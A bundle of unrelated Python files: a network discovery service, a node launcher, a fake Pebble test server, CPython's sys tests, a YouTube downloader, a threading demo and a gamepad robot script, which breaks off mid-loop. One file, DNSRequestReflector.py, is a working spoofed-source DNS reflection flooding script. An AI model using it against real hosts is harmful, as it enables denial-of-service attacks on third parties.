print(f"WARNING: while processing '{discovery_filename}': {e}\n{''.join(traceback.format_tb(e.__traceback__))}")
except FileNotFoundError:
pass
def register_service(self, name, value):
self._services[name] = value
def deregister_service(self, name):
del self._services[name]
def register_dynamic_service(self, name, callback):
self._callbacks[name] = callback
    def deregister_dynamic_service(self, name):
del self._callbacks[name]
@staticmethod
def _get_ip_address_from_interface(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, bytearray(struct.pack('256s', bytes(ifname[:15], 'utf-8'))))[20:24])
@staticmethod
def _get_hostname():
hostname = "UNKNOWN"
if os.path.exists("/etc/hostname"):
with open("/etc/hostname", "rt") as textFile:
hostname = textFile.read()
else:
# noinspection PyBroadException
try:
hostname = subprocess.Popen('hostname', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) \
.stdout.readlines()[0].decode('ascii')
except Exception:
pass
hostname = hostname.split(".")[0].replace('\n', '')
if hostname.startswith("gcc-"):
hostname = hostname[4].upper() + hostname[5:]
hostname = hostname.replace("-", "")
return hostname
@staticmethod
def _get_ip_address(client_ip):
client_ip = client_ip.split('.')
def _calc_weight(ip1):
j = 0
while j < len(ip1) and j < len(client_ip) and ip1[j] == client_ip[j]:
j += 1
return j
all_ips = [iface.addrs['inet'].split('.') for iface in get_interfaces().values() if 'inet' in iface.addrs and 'broadcast' in iface.addrs]
ip_weights = {".".join(ip): _calc_weight(ip) for ip in all_ips}
return max(ip_weights, key=lambda k: ip_weights[k])
def _prepare_response(self, client_ip):
response_map = {
"IP": self._get_ip_address(client_ip),
"NAME": self._get_hostname(),
"TYPE": self._type}
for service_name in self._services:
response_map[service_name] = self._services[service_name]
for callback_name in self._callbacks:
callback = self._callbacks[callback_name]
callback(response_map)
return "A#" + ";".join([k + "=" + v for k, v in response_map.items()])
def _receive(self):
self._receiving_socket.settimeout(10)
if self._debug:
print(" Started receive thread...")
while not self._stop:
# noinspection PyBroadException
try:
data, addr = self._receiving_socket.recvfrom(1024)
request = str(data, 'utf-8')
if self._debug:
print("Received: " + str(request))
if request.startswith("Q#"):
p = {kv[0].strip(): kv[1].strip() for kv in [line.split("=") for line in [entry.replace('\n', '') for entry in request[2:].split(';')]]}
return_ip = p["IP"]
# noinspection PyBroadException
try:
return_port = int(p["PORT"])
except Exception:
return_port = 0xd15c
response = self._prepare_response(return_ip)
self._send(return_ip, return_port, response)
# except Exception as ex:
# print("ERROR: " + str(ex) + "\n" + ''.join(traceback.format_tb(ex.__traceback__)))
except Exception:
pass
def _send(self, ip, port, packet):
if self._debug:
print("Debug: sending packet to " + str(ip) + ":" + str(port) + " " + packet)
sending_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sending_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sending_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sending_socket.setblocking(False)
sending_socket.sendto(bytes(packet, 'utf-8'), (ip, port))
def start(self):
self._stop = False
self._receiving_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._receiving_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._receiving_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self._receiving_socket.bind(('', 0xd15c))
self._thread = threading.Thread(target=self._receive, args=())
self._thread.daemon = True
self._thread.start()
def stop(self):
self._stop = True
if __name__ == "__main__":
try:
import pyroslib
print("Starting discovery service...")
pyroslib.init("discovery-service")
discovery_service = Discovery("PYROS")
# discovery_service._debug = True
discovery_service.start()
print("Started discovery service.")
pyroslib.forever(0.5, priority=pyroslib.PRIORITY_LOW)
except Exception as ex:
print("ERROR: " + str(ex) + "\n" + ''.join(traceback.format_tb(ex.__traceback__)))
|
func.py
|
import threading, time, sys, os, socket
import getpass
from diggi_orchestration import *
from diggi_build import *
#Which process to debug
#setup key exchange beforehand
#ssh-keygen -t rsa # ENTER to every field
#ssh-copy-id myname@somehost
ownip = (([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")] or [[(s.connect(("8.8.8.8", 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) + ["no IP found"])[0]
assert(len(ownip))
owndnsname = socket.gethostbyaddr(ownip)[0]
def run_node(port, identifier):
RunNode("output", port, identifier)
def run_node_debug(port, identifier):
#time.sleep(5) # debug late start
RunNodeDebug("output", port, identifier)
def run_node_valgrind(port,identifier):
RunNodeValgrind("output",port,identifier)
def run_node_sgx_debug(port,identifier):
RunNodeSGXDebug("output", port,identifier)
def run_node_callgrind(port,identifier):
RunNodeCallgrind("output",port,identifier)
def run_node_remote(host, port, identifier):
cmd = '''ssh -tt '''+ str(getpass.getuser()) + '''@''' + str(host) +''' "cd ~/output && ./diggi_base_executable --port '''+ str(port) +''' --id ''' + str(identifier) + '''" '''
print(cmd)
os.system(cmd)
def func_start():
json_configuration = get_diggi_configuration('configuration.json')
identifier = 0
debugtarget = int(json_configuration['DebugTargetProcess'])
debugengine = json_configuration['DebugEngine']
thread_arr = list()
for attribute, value in json_configuration['structure'].iteritems():
destination = ""
identifier += 1
for attribute1, value1 in value.iteritems():
if "network" in attribute1:
destination = value1
host = destination.split(':')[0]
port = destination.split(':')[1]
print(host)
print(owndnsname)
if (host == ownip ) or (host == owndnsname) or (host == "127.0.0.1"):
if debugtarget == identifier:
if debugengine == "gdb":
t = threading.Thread(target=run_node_debug, args=(port, identifier))
elif debugengine == "valgrind":
t = threading.Thread(target=run_node_valgrind, args=(port, identifier))
elif debugengine == "sgx-gdb":
t = threading.Thread(target=run_node_sgx_debug, args=(port, identifier))
elif debugengine == "callgrind":
t = threading.Thread(target=run_node_callgrind, args=(port, identifier))
else:
t = threading.Thread(target=run_node, args=(port, identifier))
else:
t = threading.Thread(target=run_node, args=(port, identifier))
t.start()
thread_arr.append(t)
else:
#setup key exchange beforehand to avoid password for each copy
print("PREREQUISITE BEFORE EXECUTING")
print("Create ssh identity and copy ids to remote machines: ")
print(" ssh-keygen -t rsa")
print(" ssh-copy-id myname@somehos")
os.system("ssh " + str(getpass.getuser())+ "@" + host + " 'rm -r -f output/'")
os.system("ssh " + str(getpass.getuser())+ "@" + host + " 'mkdir -p output'")
os.system("scp -r output/* "+ str(getpass.getuser())+ "@" + host + ":~/output/")
#old rsync, not used anymore
#os.system('''rsync --delete --ignore-times --ignore-existing -arvce "ssh -o StrictHostKeyChecking=no" -r ~/output/ '''+ host +''':~/output/''')
t = threading.Thread(target=run_node_remote,args=(host, port, identifier))
t.start()
thread_arr.append(t)
while True:
time.sleep(1)
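
# Illustrative only: the shape func_start() appears to expect in
# configuration.json, inferred from the parsing above. Only 'structure',
# 'DebugTargetProcess' and 'DebugEngine' are read here; the entry names and
# addresses below are placeholders.
#
#     {
#         "DebugTargetProcess": "1",
#         "DebugEngine": "gdb",
#         "structure": {
#             "proc_a": {"network": "127.0.0.1:6000"},
#             "proc_b": {"network": "somehost:6001"}
#         }
#     }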
|
fake_pebble.py
|
# Copyright 2021 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Fake (partial) Pebble server to allow testing the HTTP-over-Unix-socket protocol."""
import http.server
import json
import os
import re
import socketserver
import tempfile
import threading
import urllib.parse
class Handler(http.server.BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
self.routes = [
('GET', re.compile(r'^/system-info$'), self.get_system_info),
('POST', re.compile(r'^/services$'), self.services_action),
]
self._services = ['foo']
super().__init__(request, ('unix-socket', 80), server)
def log_message(self, format, *args):
# Disable logging for tests
pass
def respond(self, d, status=200):
self.send_response(status)
self.send_header('Content-Type', 'application/json')
self.end_headers()
d_json = json.dumps(d, indent=4, sort_keys=True)
self.wfile.write(d_json.encode('utf-8'))
def bad_request(self, message):
d = {
"result": {
"message": message,
},
"status": "Bad Request",
"status-code": 400,
"type": "error"
}
self.respond(d, 400)
def not_found(self):
d = {
"result": {
"message": "invalid API endpoint requested"
},
"status": "Not Found",
"status-code": 404,
"type": "error"
}
self.respond(d, 404)
def method_not_allowed(self):
d = {
"result": {
"message": 'method "PUT" not allowed'
},
"status": "Method Not Allowed",
"status-code": 405,
"type": "error"
}
self.respond(d, 405)
def internal_server_error(self, msg):
d = {
"result": {
"message": "internal server error: {}".format(msg),
},
"status": "Internal Server Error",
"status-code": 500,
"type": "error"
}
self.respond(d, 500)
def do_GET(self): # noqa: N802
self.do_request('GET')
def do_POST(self): # noqa: N802
self.do_request('POST')
def do_request(self, request_method):
path, _, query = self.path.partition('?')
path = urllib.parse.unquote(path)
query = dict(urllib.parse.parse_qsl(query))
if not path.startswith('/v1/'):
self.not_found()
return
path = path[3:]
allowed = []
for method, regex, func in self.routes:
match = regex.match(path)
if match:
if request_method == method:
data = self.read_body_json()
try:
func(match, query, data)
except Exception as e:
self.internal_server_error(e)
raise
return
allowed.append(method)
if allowed:
self.method_not_allowed()
return
self.not_found()
def read_body_json(self):
try:
content_len = int(self.headers.get('Content-Length', ''))
except ValueError:
content_len = 0
if not content_len:
return None
body = self.rfile.read(content_len)
if isinstance(body, bytes):
body = body.decode('utf-8')
return json.loads(body)
def get_system_info(self, match, query, data):
self.respond({
"result": {
"version": "3.14.159"
},
"status": "OK",
"status-code": 200,
"type": "sync"
})
def services_action(self, match, query, data):
action = data['action']
services = data['services']
if action == 'start':
for service in services:
if service not in self._services:
self.bad_request('service "{}" does not exist'.format(service))
return
self.respond({
"change": "1234",
"result": None,
"status": "Accepted",
"status-code": 202,
"type": "async"
})
else:
self.bad_request('action "{}" not implemented'.format(action))
def start_server():
socket_dir = tempfile.mkdtemp(prefix='test-ops.pebble')
socket_path = os.path.join(socket_dir, 'test.socket')
server = socketserver.UnixStreamServer(socket_path, Handler)
thread = threading.Thread(target=server.serve_forever)
thread.start()
def shutdown():
server.shutdown()
server.server_close()
thread.join()
os.remove(socket_path)
os.rmdir(socket_dir)
return (shutdown, socket_path)
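

def _example_unix_client(socket_path):
    """Illustrative sketch only (not used by any test): query the fake server
    over its Unix socket using nothing but the standard library."""
    import http.client
    import socket

    class UnixHTTPConnection(http.client.HTTPConnection):
        def __init__(self, path):
            super().__init__('localhost')
            self._socket_path = path

        def connect(self):
            sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            sock.connect(self._socket_path)
            self.sock = sock

    conn = UnixHTTPConnection(socket_path)
    try:
        conn.request('GET', '/v1/system-info')
        return json.loads(conn.getresponse().read().decode('utf-8'))
    finally:
        conn.close()
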
if __name__ == '__main__':
import time
shutdown, socket_path = start_server()
print('Serving HTTP over socket', socket_path)
# Wait forever (or till Ctrl-C pressed)
try:
while True:
time.sleep(1)
finally:
shutdown()
|
DNSRequestReflector.py
|
#!/usr/bin/python
from scapy.all import *
from threading import *
from optparse import OptionParser
#import time
import socket
def queryDnsServer(targetHost,dnsServer):
answer = IP(dst=dnsServer,src=targetHost)/UDP()/DNS(rd=1,qd=DNSQR(qname="www.thepacketgeek.com")) #just fire the packet ;)
send(answer)
def readDnsServersFromFile(targetHost,dnsServersFile):
f = open(dnsServersFile,'r')
for line in f.readlines():
dnsServer = line.strip('\r').strip('\n')
print "Sending DNS request to: "+str(dnsServer)
t = Thread(target=queryDnsServer,args=(targetHost,dnsServer))
        t.start()
def main():
parser = OptionParser()
parser.add_option("-t", "--tgtHost", dest="tgtHost",
help="tgtHost", metavar="tgtHost")
parser.add_option("-f", "--dnsServersFile", dest="dnsServersFile",
help="dnsServersFile", metavar="dnsServersFile")
(options, args) = parser.parse_args()
if options.tgtHost is None and options.dnsServersFile is None:
parser.print_help()
exit(0)
targetHost = options.tgtHost
dnsServers = options.dnsServersFile
readDnsServersFromFile(targetHost,dnsServers)
if __name__ == '__main__':
main()
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
import sys, cStringIO
class SysModuleTest(unittest.TestCase):
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assert_(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assert_(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assert_(typ is not None)
self.assert_(value is exc)
self.assert_(traceback is not None)
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assert_(typ is None)
self.assert_(value is None)
self.assert_(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assert_(typ1 is typ2)
self.assert_(value1 is exc)
self.assert_(value1 is value2)
self.assert_(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit, exc:
self.assertEquals(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
        # call with integer argument
try:
sys.exit(42)
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
        # call with tuple argument with one entry
        # entry will be unpacked
try:
sys.exit((42,))
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit, exc:
self.assertEquals(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit, exc:
self.assertEquals(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
import subprocess
# both unnormalized...
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit, 46"])
self.assertEqual(rc, 46)
# ... and normalized
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assert_(isinstance(sys.getdefaultencoding(), str))
# testing sys.settrace() is done in test_trace.py
# testing sys.setprofile() is done in test_profile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEquals(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
if hasattr(sys, "getwindowsversion"):
v = sys.getwindowsversion()
self.assert_(isinstance(v, tuple))
self.assertEqual(len(v), 5)
self.assert_(isinstance(v[0], int))
self.assert_(isinstance(v[1], int))
self.assert_(isinstance(v[2], int))
self.assert_(isinstance(v[3], int))
self.assert_(isinstance(v[4], str))
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assert_(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assert_(isinstance(sys.gettotalrefcount(), int))
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assert_(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assert_(main_id in d)
self.assert_(thread_id in d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assert_(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
        # from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assert_(sourceline in ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assert_(0 in d)
self.assert_(d[0] is sys._getframe())
def test_attributes(self):
self.assert_(isinstance(sys.api_version, int))
self.assert_(isinstance(sys.argv, list))
self.assert_(sys.byteorder in ("little", "big"))
self.assert_(isinstance(sys.builtin_module_names, tuple))
self.assert_(isinstance(sys.copyright, basestring))
self.assert_(isinstance(sys.exec_prefix, basestring))
self.assert_(isinstance(sys.executable, basestring))
self.assert_(isinstance(sys.hexversion, int))
self.assert_(isinstance(sys.maxint, int))
if test.test_support.have_unicode:
self.assert_(isinstance(sys.maxunicode, int))
self.assert_(isinstance(sys.platform, basestring))
self.assert_(isinstance(sys.prefix, basestring))
self.assert_(isinstance(sys.version, basestring))
vi = sys.version_info
self.assert_(isinstance(vi, tuple))
self.assertEqual(len(vi), 5)
self.assert_(isinstance(vi[0], int))
self.assert_(isinstance(vi[1], int))
self.assert_(isinstance(vi[2], int))
self.assert_(vi[3] in ("alpha", "beta", "candidate", "final"))
self.assert_(isinstance(vi[4], int))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
self.assert_(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_main():
test.test_support.run_unittest(SysModuleTest)
if __name__ == "__main__":
test_main()
|
tube_loader.py
|
from pytube import YouTube
from tkinter import *
from tkinter.filedialog import askdirectory
from tkinter.messagebox import showinfo
from threading import *
file_size = 0
# to show the progress of download
def progress_of_download(stream=None, chunk=None, bytes_remaining=None):
global file_size
#getting the percentage of the file
file_downloaded = (file_size - bytes_remaining)
percntg = (file_downloaded / file_size) * 100
Download_btn.config(text='{:00.0f} % downloaded'.format(percntg))
def startDownload():
global file_size
try:
url = urlfield.get()
        # changing button text
Download_btn.config(text="please wait...")
Download_btn.config(state=DISABLED)
path_to_save_video= askdirectory()
        if not path_to_save_video:  # askdirectory() returns '' if the dialog is cancelled
return
ob = YouTube(url, on_progress_callback=progress_of_download)
strm = ob.streams[0]
file_size = strm.filesize
strm.download(path_to_save_video)
Download_btn.config(text="Start Download")
Download_btn.config(state=NORMAL)
showinfo("Download Finished","Downloaded successfully")
urlfield.delete(0,END)
except Exception as e:
print(e)
print("error !!")
def start_Download_Thread():
# creating thread
thread = Thread(target=startDownload)
thread.start()
# starting gui building
main=Tk()
main.title("Youtube Downloader")
# setting icon
main.iconbitmap('icon.ico')
main.geometry("500x400")
#creating icon of the gui
File = PhotoImage(file='image.png')
headingIcon = Label(main, image=File)
headingIcon.pack(side=TOP)
#creating field to enter url
urlfield = Entry(main, width=25, font=("verdana",17),justify= CENTER)
urlfield.pack(side=TOP)
#creating download button
Download_btn = Button(main, text="start download",command= start_Download_Thread)
Download_btn.pack(side=TOP,pady=10)
main.mainloop()
|
threading_semaphore_demo03.py
|
# -*- coding: utf-8 -*-
import threading
import time
import random
semaphore = threading.Semaphore(value=0)
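# Starting the semaphore at 0 means acquire() in consumer() blocks straight
# away, so the consumer cannot proceed until the producer has set 'item' and
# called release(); the semaphore is used here as a signal rather than as a
# counter of available resources.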
def consumer():
print("consumer is waiting")
semaphore.acquire()
print("Consumer notify: consumerd item number {}".format(item))
def producer():
global item
time.sleep(10)
item = random.randint(0, 1000)
print("producer notify: produced item number {}".format(item))
semaphore.release()
if __name__ == '__main__':
for i in range(5):
t1 = threading.Thread(target=producer)
t2 = threading.Thread(target=consumer)
t1.start()
t2.start()
t1.join()
t2.join()
print("program done")
|
robot.py
|
# This is an example program showing different methods of controlling motors, servos, and Neopixels.
# It works with a Rock Candy or PiHut PS3 controller.
# The left stick controls the speed and direction of both motors - push up to go forwards, down for backwards and left or right to steer.
# The right stick directly controls two servo motors connected to GPIO pins 21 and 22.
# The R1 button starts or stops turbo mode (the robot goes faster!).
# The L1 and L2 buttons move a servo connected to GPIO 22 to two pre-set positions.
# The Square button starts or stops a servo connected to GPIO 20 slowly sweeping left to right. This uses multiprocessing to run at the same time as the main program loop.
# The Triangle, Circle, and X buttons start and stop different Neopixels sequences - also with multiprocessing.
# Author: Neil Lambeth. neil@redrobotics.co.uk @NeilRedRobotics
from __future__ import print_function # Make print work with python 2 & 3
from evdev import InputDevice, ecodes
import redboard
import multiprocessing
import time
try:
import neopixels # Neopixels need to be run with 'sudo', just a reminder!
except RuntimeError:
print ('')
print ("Remember to use 'sudo' if you're using neopixels!")
print ('')
exit()
dev = InputDevice('/dev/input/event0')
#print(dev)
device = str(dev).find('Rock Candy') # Look for a Rock Candy or PiHut controller
if device != -1:
print ('Controller: Rock Candy PS3 Gamepad')
controller = 1
else:
print ('Controller: PiHut PS3 Gamepad')
controller = 2
# Button mapping for different controllers
if controller == 1: # Rock Candy
triangle, x, square, circle = 307, 305, 304, 306
R1, R2, R3 = 309, 311, 315
L1, L2, L3 = 308, 310, 314
select, start, home = 312, 313, 316
if controller == 2: # PiHut
triangle, x, square, circle = 308, 304, 307, 305
R1, R2, R3 = 311, 313, 318
L1, L2, L3 = 310, 312, 317
select, start, home = 314, 315, 316
# Set up variables
RX = 0
LX = 0
RY = 0
LY = 0
LeftY = 0
LeftX = 0
LeftX_R = 0
LeftX_L = 0
Leftmotor = 0
Rightmotor = 0
LM_OLD = 0
RM_OLD = 0
turbo = False
invertX = False
triangleToggle = False
xToggle = False
circleToggle = False
squareToggle = False
# Function to use with multiprocessing to sweep a servo slowly left and right
# without interrupting the normal program flow
def servoSlowSweep():
#print ('Servo Slow')
while True:
for i in range(600,2400,5):
redboard.servo20_P(i)
time.sleep(0.05)
for i in range(2400,600,-5):
redboard.servo20_P(i)
time.sleep(0.05)
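
# Illustrative only (this helper is never called; the main loop below keeps
# its inline version): the left-stick mixing written as a pure function.
# 'forward' is -127..127 from the vertical axis and at most one of
# 'steer_left'/'steer_right' is non-zero (0..127) from the horizontal axis.
def _mix_sticks(forward, steer_left, steer_right):
    if forward == 0:
        # Spin on the spot: drive the motors in opposite directions
        return (-steer_left + steer_right, steer_left - steer_right)
    if forward > 0:
        # Forwards: steering slows one side down but never reverses it
        return (max(forward - steer_left, 0), max(forward - steer_right, 0))
    # Backwards: same idea with the signs flipped
    return (min(forward + steer_left, 0), min(forward + steer_right, 0))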
# Set up neopixel processes - neopixel code is in ~/RedBoard/neopixels.py
p1 = multiprocessing.Process(target = neopixels.knightRider)
p1.start() # Start the neopixel display when the program starts
triangleToggle = True
p2 = multiprocessing.Process(target = neopixels.headLights)
p3 = multiprocessing.Process(target = neopixels.demo)
p4 = multiprocessing.Process(target = servoSlowSweep)
# Read gamepad buttons-----------------------------------------------------------
for event in dev.read_loop():
#print(event) # Uncomment to show all button data
if event.type == ecodes.EV_KEY:
#print(event.code) # Uncomment to show each keycode
# Button pressed code
if event.value == 1:
if event.code == triangle and triangleToggle == False: # Toggles the button press - one press for on - one press for off.
triangleToggle = True
print ('triangle on')
# Start and stop the neopixel processes - it's important to only run one neopixel process at any one time. So check and stop other processes if they are running.
if p1.is_alive() == False: # Make sure the process isn't already running
if p2.is_alive() == True: # Kill the other process if it's running
p2.terminate()
if p3.is_alive() == True: # Kill the other process if it's running
p3.terminate()
p1 = multiprocessing.Process(target = neopixels.knightRider)
p1.start() # Start the process
elif event.code == triangle and triangleToggle == True:
triangleToggle = False
print ('triangle off')
p1.terminate()
neopixels.clear()
elif event.code == x and xToggle == False:
xToggle = True
print ('X on')
if p2.is_alive() == False: # Make sure the process isn't already running
if p1.is_alive() == True: # Kill the other process if it's running
p1.terminate()
if p3.is_alive() == True: # Kill the other process if it's running
p3.terminate()
p2 = multiprocessing.Process(target = neopixels.headLights)
p2.start() # Start the process
elif event.code == x and xToggle == True:
xToggle = False
print ('x off')
p2.terminate()
neopixels.clear()
elif event.code == circle and circleToggle == False:
circleToggle = True
print ('Circle on')
if p3.is_alive() == False: # Make sure the process isn't already running
if p1.is_alive() == True: # Kill the other process if it's running
p1.terminate()
if p2.is_alive() == True: # Kill the other process if it's running
p2.terminate()
p3 = multiprocessing.Process(target = neopixels.demo)
p3.start() # Start the process
elif event.code == circle and circleToggle == True:
circleToggle = False
print ('Circle off')
p3.terminate()
neopixels.clear()
elif event.code == square and squareToggle == False:
squareToggle = True
print ('Square on')
if p4.is_alive() == False: # Make sure the process isn't already running
p4 = multiprocessing.Process(target = servoSlowSweep)
p4.start() # Start the process
elif event.code == square and squareToggle == True:
squareToggle = False
print ('Square off')
p4.terminate()
elif event.code == R1:
print ('R1 - Turbo On')
turbo = True
elif event.code == R2:
print ('R2')
elif event.code == R3:
print ('R3')
elif event.code == L1:
print ('L1')
                redboard.servo22(80) # Send the position to the servo
elif event.code == L2:
print ('L2')
                redboard.servo22(-80) # Send the position to the servo
elif event.code == L3:
print ('L3')
elif event.code == select and invertX == False:
print ('Invert X')
invertX = True
elif event.code == select and invertX == True:
print ('Normal X')
invertX = False
elif event.code == start:
print ('Start')
elif event.code == home:
print ('Home')
# Button Release Code------------------------------------------------
if event.value == 0: # Button released
if event.code == R1: # Turbo Off
print ('R1 - Turbo Off')
turbo = False
elif event.code == R2:
print ('R2')
elif event.code == L1 or event.code == L2: # Servos Centre
print ('Servo Centre')
redboard.servo22(0)
# Analogue Sticks and Dpad---------------------------------------------
if event.type == ecodes.EV_ABS:
print('')
print('---------------------------------')
# Dpad
if event.code == 16:
if event.value == -1:
print ('Dpad LEFT')
if event.value == 1:
print ('Dpad RIGHT')
if event.code == 17:
if event.value == -1:
print ('Dpad UP')
if event.value == 1:
print ('Dpad DOWN')
# Right analogue stick servo controls
elif event.code == 5: # Right analogue Vertical stick
RY = event.value
#print (RY)
S21 = redboard.mapServo(RY) # Scale the value from the
# joystick to work with the servo
            redboard.servo21_P(S21) # Send the position to the servo
elif event.code == 2: # Right analogue Horizontal stick
RX = event.value
#print (RX)
S22 = redboard.mapServo(RX) # Scale the value from the
# joystick to work with the servo
            redboard.servo22_P(S22) # Send the position to the servo
# Left analogue stick motor controls
if event.code == 1: # Left analogue Vertical stick
# The analogue stick gives a value between 0-255
# Convert the value to 0-127 for forwards
# and 0- -127 for backwards
LY = event.value
if LY < 128: # Forwards
LeftY = 127 - LY
#print('LY =',LY)
#print('LeftY = ',LeftY)
elif LY >= 128: # Backwards
LeftY = LY - 128
LeftY = -LeftY # Make negative
